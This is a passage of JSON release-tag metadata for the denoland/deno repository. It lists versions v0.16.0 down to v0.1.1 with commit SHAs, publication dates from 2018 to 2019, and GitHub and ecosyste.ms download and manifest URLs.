ag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.